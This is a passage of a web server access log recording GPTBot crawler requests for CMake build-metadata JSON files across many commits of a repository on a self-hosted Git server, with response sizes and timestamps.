GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12873] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11164] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13747] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12843] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13722] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" +[17/Feb/2026:19:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13596] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12792] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13745] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:19:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:19:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12793] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:19:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:48:34 